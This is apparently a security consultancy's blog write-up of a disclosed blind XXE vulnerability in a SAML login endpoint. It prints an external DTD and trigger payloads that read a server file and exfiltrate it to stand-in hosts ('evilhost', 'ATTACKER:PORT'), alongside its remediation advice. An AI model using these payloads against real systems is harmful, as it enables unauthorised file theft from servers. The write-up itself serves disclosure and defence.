← Back to Blog
June 2024 Web Security SAML XXE

Discovering a Blind XXE in an Industrial Control System SSO Portal

A critical XML External Entity vulnerability in a SAML authentication endpoint led to out-of-band server file exfiltration.

Overview

During a security research engagement, we discovered a critical vulnerability in a web application's login portal. The portal used the SAML protocol for SSO authentication, backed by an XML parser that failed to properly restrict external entity processing. This allowed us to exploit a blind XXE vulnerability and perform sensitive file reads on the underlying Windows server.

Reconnaissance

Thorough reconnaissance is foundational to any security assessment. While enumerating the target domain's directory structure, we identified an endpoint returning an HTTP 500 error: logout.aspx. This immediately told us two things about the environment:

  • The web server was running on Windows
  • The application was built on the ASP.NET framework

Examining the endpoint's functionality revealed verbose error messages in the response. The source indicated that the endpoint accepted POST requests with two key parameters during the authentication flow: SAMLRequest and SAMLResponse.

Identifying the Vulnerability

The SAMLResponse parameter contained a Base64 and URL-encoded XML string used for backend SAML authentication. If the backend XML parser doesn't properly sanitize inputs or disable external entity processing, an attacker can inject malicious XML to interact with the server.

We tested this hypothesis with a basic XML payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY % asd SYSTEM "http://evilhost"> %asd;]>

The server responded with an error indicating it could not resolve the remote host http://evilhost. This confirmed the XML parser was processing our injected entities — a clear indicator of XXE vulnerability.

We modified the payload to point to a server under our control and received a callback, confirming the vulnerability was exploitable.

Escalation: Out-of-Band File Exfiltration

With XXE confirmed, the next step was demonstrating real-world impact. The server did not reflect file contents in its responses, making this a blind XXE. Direct data retrieval wasn't possible through the application's response body.

To work around this limitation, we used an out-of-band (OOB) exfiltration technique. OOB exfiltration causes the vulnerable application to send data to an external server through a secondary channel, rather than returning it in the HTTP response.

The Technique

We hosted a malicious DTD file on our server that instructs the XML parser to:

  1. Read the contents of a target file on the server
  2. Send those contents as a URL parameter to our listener

External DTD (hosted on attacker server):

<!ENTITY % file SYSTEM "file:///C:\windows\win.ini">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM
  'http://ATTACKER:PORT/?data=%file;'>">
%eval;
%exfil;

Trigger payload (Base64 + URL encoded in SAMLResponse):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % asd SYSTEM "http://ATTACKER:PORT/exploit.dtd">
  %asd;
]>
<foo>&send;</foo>

Execution Flow

  1. The SAML endpoint processes our payload and the XML parser fetches our external DTD
  2. The DTD instructs the parser to read C:\windows\win.ini from the local filesystem
  3. The file contents are sent as a query parameter to our listener
  4. We decode the exfiltrated data from our server logs

The result: full contents of the target file retrieved through a blind XXE, confirmed via our server logs.

Impact

This vulnerability allowed an unauthenticated attacker to:

  • Read arbitrary files from the server's filesystem
  • Potentially access configuration files containing database credentials, API keys, or other secrets
  • Map the internal network through SSRF by targeting internal hosts
  • Compromise the SSO authentication mechanism that gates access to the entire application

Remediation

This vulnerability was responsibly disclosed to the application owner, who implemented the following fixes:

  • Disabled external entity processing in the XML parser
  • Disabled DTD processing entirely where not required
  • Implemented input validation on SAML parameters
  • Added server-side egress filtering to prevent OOB callbacks

Key Takeaways

  • SAML implementations are a frequent source of XXE vulnerabilities because they inherently process XML
  • Error messages that reveal server-side technology (ASP.NET, framework versions) assist attackers in tailoring their approach
  • Blind XXE doesn't mean unexploitable — OOB exfiltration techniques can extract data without any visible response
  • XML parsers should always disable external entity processing by default

Concerned about XXE or SAML security in your applications?

Redmount Cyber specializes in identifying vulnerabilities like these before attackers do.

Request an Assessment